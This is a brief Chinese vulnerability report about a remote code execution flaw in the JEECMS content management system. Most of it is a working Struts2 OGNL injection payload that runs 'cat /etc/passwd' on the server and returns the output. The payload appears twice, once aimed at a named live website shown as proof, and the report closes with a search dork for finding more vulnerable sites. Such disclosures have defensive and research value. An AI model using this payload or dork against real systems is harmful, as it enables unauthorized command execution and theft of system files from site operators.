VULHUB ™

### 简要描述： JEECMS网站内容管理系统存在新的远程代码执行漏洞 ### 详细说明： JEECMS网站内容管理系统存在新的远程代码执行漏洞 测试代码:?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29} ### 漏洞证明： ```...

### 简要描述： JEECMS网站内容管理系统存在新的远程代码执行漏洞 ### 详细说明： JEECMS网站内容管理系统存在新的远程代码执行漏洞 测试代码:?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29} ### 漏洞证明： ``` http://www.dlbc.org.cn/login/Jeecms.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29} ``` [<img src="https://images.seebug.org/upload/201307/261514171bcfab9ce17f67cc7a6e2fbf7cf5a892.png" alt="1.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/261514171bcfab9ce17f67cc7a6e2fbf7cf5a892.png) 直接 ``` inurl:Jeecms.do ``` [<img src="https://images.seebug.org/upload/201307/261519085ed17373115f9e98e3860f24563f5f30.png" alt="2.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/261519085ed17373115f9e98e3860f24563f5f30.png)